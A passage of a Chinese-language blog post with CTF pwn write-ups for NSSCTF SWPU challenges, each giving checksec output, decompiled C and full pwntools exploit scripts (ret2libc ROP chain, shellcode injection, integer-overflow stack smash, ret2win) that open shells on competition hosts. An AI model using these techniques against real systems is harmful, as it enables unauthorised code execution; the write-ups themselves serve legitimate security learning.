<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> *<br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br>p = remote(<span class="hljs-string">&quot;node7.anna.nssctf.cn&quot;</span>,<span class="hljs-number">28828</span>)<br>elf = ELF(<span class="hljs-string">&#x27;./white_give&#x27;</span>)<br>offset = <span class="hljs-number">0x10</span> + <span class="hljs-number">0x8</span><br>puts_plt_addr = elf.plt[<span class="hljs-string">&#x27;puts&#x27;</span>]<br>puts_got_addr = elf.got[<span class="hljs-string">&#x27;puts&#x27;</span>]<br>main_addr = <span class="hljs-number">0x4006d6</span><br>pop_rdi = <span class="hljs-number">0x400763</span><br>ret_addr = <span class="hljs-number">0x400509</span><br>payload1 = offset * <span class="hljs-string">b&#x27;a&#x27;</span> + p64(pop_rdi) + p64(puts_got_addr) + p64(puts_plt_addr) + p64(main_addr)<br>p.sendline(payload1)<br>puts_addr = u64(p.recvuntil(<span class="hljs-string">b&#x27;\x7f&#x27;</span>)[-<span class="hljs-number">6</span>:].ljust(<span class="hljs-number">8</span>,<span class="hljs-string">b&#x27;\x00&#x27;</span>))<br>libc = LibcSearcher(<span class="hljs-string">&quot;puts&quot;</span>, puts_addr)<br>libc_base = puts_addr - libc.dump(<span class="hljs-string">&#x27;puts&#x27;</span>)<br>system_addr = libc_base + libc.dump(<span class="hljs-string">&#x27;system&#x27;</span>)<br>bin_sh_addr = libc_base + libc.dump(<span class="hljs-string">&#x27;str_bin_sh&#x27;</span>)<br>payload2 = offset * <span class="hljs-string">b&#x27;a&#x27;</span> + p64(pop_rdi) + p64(bin_sh_addr) + p64(ret_addr) + p64(system_addr)<br>p.sendline(payload2)<br>p.interactive()<br></code></pre></td></tr></table></figure>

<p>这道题远程环境有问题，本地能打通但是远程打不通……</p>
<h3 id="SWPUCTF-2022-新生赛-shellcode？"><a href="#SWPUCTF-2022-新生赛-shellcode？" class="headerlink" title="[SWPUCTF 2022 新生赛]shellcode？"></a>[SWPUCTF 2022 新生赛]shellcode？</h3><p>Checksec 一下：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs shell">Arch:       amd64-64-little<br>RELRO:      Full RELRO<br>Stack:      No canary found<br>NX:         NX enabled<br>PIE:        PIE enabled<br>SHSTK:      Enabled<br>IBT:        Enabled<br>Stripped:   No<br></code></pre></td></tr></table></figure>

<p>64位程序，NX，PIE，SHSTK，IBT均开启，地址随机化，无法注入shellcode，ROP攻击无效。</p>
<p>查看源代码：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs C"><span class="hljs-type">int</span> __fastcall <span class="hljs-title function_">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **argv, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **envp)</span><br>&#123;<br>  init(argc, argv, envp);<br>  mmap((<span class="hljs-type">void</span> *)<span class="hljs-number">0x30303000</span>, <span class="hljs-number">0x1000u</span>LL, <span class="hljs-number">7</span>, <span class="hljs-number">50</span>, <span class="hljs-number">-1</span>, <span class="hljs-number">0LL</span>);<br>  <span class="hljs-comment">//在地址0x30303000创建内存映射，7表示RWX即可读可写可执行的内存区域</span><br>  read(<span class="hljs-number">0</span>, (<span class="hljs-type">void</span> *)<span class="hljs-number">0x30303000</span>, <span class="hljs-number">0x64u</span>LL);<br>  <span class="hljs-comment">//在该内存区域可以注入任意可执行的代码</span><br>  MEMORY[<span class="hljs-number">0x30303000</span>]();<span class="hljs-comment">//执行内存中的代码</span><br>  <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>分析代码可得，虽然NX保护开启，但是代码在内存中创建了一个具有RWX权限的新区域，绕过了NX检查，read函数和后面将内存区域当作函数进行调用的语句说明我们注入任意可执行代码的可行性。</p>
<p>思路：注入shellcode</p>
<p>编写exp:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context.arch = <span class="hljs-string">&#x27;amd64&#x27;</span><br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br>REMOTE_HOST = <span class="hljs-string">&#x27;node5.anna.nssctf.cn&#x27;</span>  <span class="hljs-comment"># 如果远程，替换为IP</span><br>REMOTE_PORT = <span class="hljs-number">28411</span>   <span class="hljs-comment"># 替换为端口</span><br>shellcode = asm(shellcraft.sh())<span class="hljs-comment">#shellcode自动生成</span><br><br><span class="hljs-comment"># 填充至100字节（NOP滑板或补零）</span><br>shellcode = shellcode.ljust(<span class="hljs-number">100</span>, <span class="hljs-string">b&#x27;\x90&#x27;</span>)<br>p = remote(REMOTE_HOST, REMOTE_PORT)<br><br><span class="hljs-comment"># 发送shellcode并交互</span><br>p.send(shellcode)<br>p.interactive()  <span class="hljs-comment"># 获得shell或直接输出flag</span><br></code></pre></td></tr></table></figure>

<p>执行程序，拿到flag</p>
<h3 id="SWPUCTF-2022-新生赛-Integer-Overflow"><a href="#SWPUCTF-2022-新生赛-Integer-Overflow" class="headerlink" title="[SWPUCTF 2022 新生赛]Integer Overflow"></a>[SWPUCTF 2022 新生赛]Integer Overflow</h3><p>checksec一下：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs shell">Arch:       i386-32-little<br>RELRO:      Partial RELRO<br>Stack:      No canary found<br>NX:         NX enabled<br>PIE:        No PIE (0x8048000)<br>SHSTK:      Enabled<br>IBT:        Enabled<br>Stripped:   No<br></code></pre></td></tr></table></figure>

<p>32位程序，NX开启，SHSTK开启，无法使用shellcode和ROP攻击</p>
<p>查看源代码：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs C"><span class="hljs-type">int</span> __cdecl <span class="hljs-title function_">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **argv, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **envp)</span><br>&#123;<br>  init(&amp;argc);<br>  <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;Ohhhh you choose pwn!?&quot;</span>);<br>  <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;\x1B[32m Do you want to pwn the world with me!?\n\x1B[0m&quot;</span>);<br>  overflow();<br>  <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>调用的函数overflow打开查看：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs C"><span class="hljs-type">int</span> <span class="hljs-title function_">overflow</span><span class="hljs-params">()</span><br>&#123;<br>  <span class="hljs-type">int</span> v1; <span class="hljs-comment">// [esp+Ch] [ebp-Ch] BYREF</span><br><br>  <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;1.yes&quot;</span>);<br>  <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;2.no&quot;</span>);<br>  <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;Tell me your choice:&quot;</span>);<br>  __isoc99_scanf(<span class="hljs-string">&quot;%d&quot;</span>, &amp;v1);<br>  <span class="hljs-keyword">if</span> ( v1 != <span class="hljs-number">1</span> )<br>  &#123;<br>    <span class="hljs-keyword">if</span> ( v1 == <span class="hljs-number">2</span> )<br>      choice2();<br>    elsechoice();<br>  &#125;<br>  choice1();<br>  <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>貌似没什么问题，查看别的函数看看？</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs C"><span class="hljs-type">ssize_t</span> <span class="hljs-title function_">choice1</span><span class="hljs-params">()</span><br>&#123;<br>  _BYTE buf[<span class="hljs-number">20</span>]; <span class="hljs-comment">// [esp+8h] [ebp-20h] BYREF</span><br>  <span class="hljs-type">size_t</span> nbytes[<span class="hljs-number">2</span>]; <span class="hljs-comment">// [esp+1Ch] [ebp-Ch] BYREF</span><br><br>  <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;\x1B[36m Good luck!!!\n\x1B[0m&quot;</span>);<br>  <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;\x1B[5m Tell me your name now!\n\x1B[0m&quot;</span>);<br>  <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;First input the length of your name:&quot;</span>);<br>  __isoc99_scanf(<span class="hljs-string">&quot;%u&quot;</span>, nbytes);<br>  <span class="hljs-keyword">if</span> ( (<span class="hljs-type">int</span>)nbytes[<span class="hljs-number">0</span>] &gt; <span class="hljs-number">10</span> )<br>  &#123;<br>    <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;\x1B[31m Are u kidding??\n\x1B[0m&quot;</span>);<br>    <span class="hljs-built_in">exit</span>(<span class="hljs-number">-1</span>);<br>  &#125;<br>  <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;\x1B[36m What&#x27;s u name?\n\x1B[0m&quot;</span>);<br>  <span class="hljs-keyword">return</span> read(<span class="hljs-number">0</span>, buf, nbytes[<span class="hljs-number">0</span>]);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>这里发现问题了：size_t类型的无符号整数nbytes[0]输入后,会被转换成int类型与10进行比较，但是如果nbytes很大，在转换成int之后会发生回绕（因为int的范围只在-2147483648～2147483647之间）从而导致绕过检查。（整数溢出漏洞）</p>
<p>当nbytes[0]的值是2147483647*2+1 &#x3D;4294967295 时，转换成int类型之后会变成1。这样会绕过(int)nbytes[0]&gt;10的检查，但是read调用的仍然是size_t类型的无符号整数，所以read函数允许输入的字节长度就变成了4294967295，很轻松的构造出了栈溢出的条件。</p>
<p>exp编写：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br>p = remote(<span class="hljs-string">&#x27;node5.anna.nssctf.cn&#x27;</span>,<span class="hljs-number">21302</span>)<br>offset = <span class="hljs-number">0x20</span> + <span class="hljs-number">0x4</span><br>system_addr = <span class="hljs-number">0x8049100</span><br>binsh_addr = <span class="hljs-number">0x0804a008</span><br>p.recvuntil(<span class="hljs-string">b&#x27;choice:&#x27;</span>)<br>p.sendline(<span class="hljs-string">b&#x27;1&#x27;</span>) <span class="hljs-comment">#不能写成p.sendline(1),因为pwntools不能发送纯数字</span><br>p.sendlineafter(<span class="hljs-string">&#x27;name:&#x27;</span>,<span class="hljs-string">&#x27;4294967295&#x27;</span>)<br>payload = offset * <span class="hljs-string">b&#x27;a&#x27;</span> + p32(system_addr) + p32(<span class="hljs-number">0</span>) + p32(binsh_addr)<br>p.sendline(payload)<br>p.interactive()<br></code></pre></td></tr></table></figure>

<p>执行程序，拿到shell</p>
<h3 id="SWPUCTF-2022-新生赛-Darling"><a href="#SWPUCTF-2022-新生赛-Darling" class="headerlink" title="[SWPUCTF 2022 新生赛]Darling"></a>[SWPUCTF 2022 新生赛]Darling</h3><p>查看源代码：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs C"><span class="hljs-type">int</span> __fastcall <span class="hljs-title function_">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **argv, <span class="hljs-type">const</span> <span class="hljs-type">char</span> **envp)</span><br>&#123;<br>  _DWORD v4[<span class="hljs-number">2</span>]; <span class="hljs-comment">// [rsp+Ch] [rbp-14h] BYREF</span><br>  <span class="hljs-type">int</span> v5; <span class="hljs-comment">// [rsp+14h] [rbp-Ch]</span><br>  <span class="hljs-type">unsigned</span> __int64 v6; <span class="hljs-comment">// [rsp+18h] [rbp-8h]</span><br><br>  v6 = __readfsqword(<span class="hljs-number">0x28u</span>);<br>  init(argc, argv, envp);<br>  pic();<br>  darling();<br>  <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;There may be many uncertainties in the world, but the only certainty is my love for you.\n&quot;</span>);<br>  v4[<span class="hljs-number">1</span>] = <span class="hljs-number">20020819</span>;<br>  srand(<span class="hljs-number">0x1317E53u</span>); <span class="hljs-comment">//设定固定的随机数种子，使得随机数也固定了</span><br>  v5 = rand() % <span class="hljs-number">100</span> - <span class="hljs-number">64</span>; <span class="hljs-comment">//v5可能值的范围只在-64~35之间</span><br>  __isoc99_scanf(<span class="hljs-string">&quot;%d&quot;</span>, v4);<span class="hljs-comment">//猜对了就能拿到flag</span><br>  <span class="hljs-keyword">if</span> ( v5 == v4[<span class="hljs-number">0</span>] )<br>    backdoor();<br>  <span class="hljs-keyword">else</span><br>    <span class="hljs-built_in">puts</span>(<span class="hljs-string">&quot;Oh :( , you didn&#x27;t get my love&quot;</span>);<br>  <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>backdoor函数直接把shell给我们了</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs C"><span class="hljs-type">int</span> <span class="hljs-title function_">backdoor</span><span class="hljs-params">()</span><br>&#123;<br>  <span class="hljs-keyword">return</span> system(<span class="hljs-string">&quot;/bin/sh&quot;</span>);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>分析代码，发现随机数是固定的，这是个伪随机数，所以只要枚举每个可能的值就可以了</p>
<p>Exp查找符合的值:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br><span class="hljs-keyword">for</span> v5 <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(-<span class="hljs-number">64</span>,<span class="hljs-number">36</span>):<br>	p = remote(<span class="hljs-string">&#x27;node5.anna.nssctf.cn&#x27;</span>,<span class="hljs-number">20135</span>)<br>  p.sendline(<span class="hljs-built_in">str</span>(v5).encode())<br>  response = p.recvline()<br>  <span class="hljs-keyword">if</span> <span class="hljs-string">b&#x27;Oh :(&#x27;</span> <span class="hljs-keyword">not</span> <span class="hljs-keyword">in</span> response:<br>    rand = v5<br>    <span class="hljs-keyword">break</span><br><span class="hljs-built_in">print</span>(rand)<br>p.close()<br></code></pre></td></tr></table></figure>

<p>暴力枚举，最后发现17符合条件，输入拿到flag</p>
<h3 id="SWPUCTF-2023-秋季新生赛-签到"><a href="#SWPUCTF-2023-秋季新生赛-签到" class="headerlink" title="[SWPUCTF 2023 秋季新生赛]签到"></a>[SWPUCTF 2023 秋季新生赛]签到</h3><p>checksec一下</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs shell">Arch:       amd64-64-little<br>RELRO:      Partial RELRO<br>Stack:      No canary found<br>NX:         NX enabled<br>PIE:        No PIE (0x400000)<br>SHSTK:      Enabled<br>IBT:        Enabled<br>Stripped:   No<br></code></pre></td></tr></table></figure>

<p>64位程序，NX开启，SHSTK和IBT开启。</p>
<p>查看源代码</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs C"><span class="hljs-type">ssize_t</span> <span class="hljs-title function_">vuln</span><span class="hljs-params">()</span><br>&#123;<br>  _BYTE buf[<span class="hljs-number">48</span>]; <span class="hljs-comment">// [rsp+0h] [rbp-30h] BYREF</span><br><br>  <span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;input:&quot;</span>);<br>  <span class="hljs-keyword">return</span> read(<span class="hljs-number">0</span>, buf, <span class="hljs-number">0xC8u</span>LL);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>有后门：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs C"><span class="hljs-type">int</span> <span class="hljs-title function_">backdoor</span><span class="hljs-params">()</span><br>&#123;<br>  <span class="hljs-keyword">return</span> system(<span class="hljs-string">&quot;/bin/sh&quot;</span>);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>明显是栈溢出。</p>
<p>偏移量：0x30 + 0x8</p>
<p>backdoor的地址：0x401232</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs shell">objdump -t sign | grep backdoor<br>0000000000401232 g     F .text  0000000000000017              backdoor<br></code></pre></td></tr></table></figure>

<p>ret的地址：0x40101a</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs shell">ROPgadget --binary sign --only &quot;ret&quot;<br>Gadgets information<br>============================================================<br>0x000000000040101a : ret<br><br>Unique gadgets found: 1<br></code></pre></td></tr></table></figure>

<p>编写exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context.log_level = <span class="hljs-string">&#x27;debug&#x27;</span><br>p = remote(<span class="hljs-string">&#x27;node4.anna.nssctf.cn&#x27;</span>,<span class="hljs-number">28288</span>)<br>offset = <span class="hljs-number">0x30</span> + <span class="hljs-number">0x8</span><br>ret_addr = <span class="hljs-number">0x40101a</span><br>backdoor_addr = <span class="hljs-number">0x401232</span><br>payload = offset * <span class="hljs-string">b&#x27;a&#x27;</span> + p64(ret_addr) + p64(backdoor_addr)<br>p.sendline(payload)<br>p.interactive()<br></code></pre></td></tr></table></figure>

<p>执行程序拿到shell，真是签到题啊这么简单。</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E4%BA%8C%E8%BF%9B%E5%88%B6%E5%AE%89%E5%85%A8/" class="category-chain-item">二进制安全</a>
  
  
    <span>></span>
    
  <a href="/categories/%E4%BA%8C%E8%BF%9B%E5%88%B6%E5%AE%89%E5%85%A8/%E5%88%B7%E9%A2%98%E9%A2%98%E8%A7%A3/" class="category-chain-item">刷题题解</a>
  
  
    <span>></span>
    
  <a href="/categories/%E4%BA%8C%E8%BF%9B%E5%88%B6%E5%AE%89%E5%85%A8/%E5%88%B7%E9%A2%98%E9%A2%98%E8%A7%A3/NSSCTF/" class="category-chain-item">NSSCTF</a>
  
  

  

  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/pwn-%E9%A2%98%E8%A7%A3-write-up/" class="print-no-link">#pwn,题解,write-up</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>NSSCTF中的SWPU刷题记录</div>
      <div>https://www.ghostfoxy.cn/2025/11/16/SWPU/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Gh0stF0xy</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年11月16日</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>更新于</div>
          <div>2025年11月19日</div>
        </div>
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2025/11/22/keypatch/" title="如何优雅地在ARM架构下为IDA Pro 9.0安装keypatch插件">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">如何优雅地在ARM架构下为IDA Pro 9.0安装keypatch插件</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/11/14/buuwp1/" title="BUUCTF题解">
                        <span class="hidden-mobile">BUUCTF题解</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.5.1/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"VhTlgfxKd3QHFcy8hxOOeYZL-gzGzoHsz","appKey":"sbmhiCHu7NJ5FlmW7gsyreKf","path":"window.location.pathname","placeholder":null,"avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":false,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":true},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
      Copyright © 2025-2026 GhostFoxy
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  var relativeDate = function() {
    var updatedTime = document.getElementById('updated-time');
    if (updatedTime) {
      var text = updatedTime.textContent;
      var reg = /\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}(?:Z|[+-]\d{2}:\d{2})/;
      var matchs = text.match(reg);
      if (matchs) {
        var relativeTime = moment(matchs[0]).fromNow();
        updatedTime.textContent = text.replace(reg, relativeTime);
      }
      updatedTime.style.display = '';
    }
  };
  Fluid.utils.createScript('https://lib.baomitu.com/moment.js/2.29.4/moment.min.js', function() {
    if (!'zh-cn'.startsWith('en')) {
      Fluid.utils.createScript('https://lib.baomitu.com/moment.js/2.29.4/locale/zh-cn.min.js', function() {
        relativeDate();
      });
    } else {
      relativeDate();
    }
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
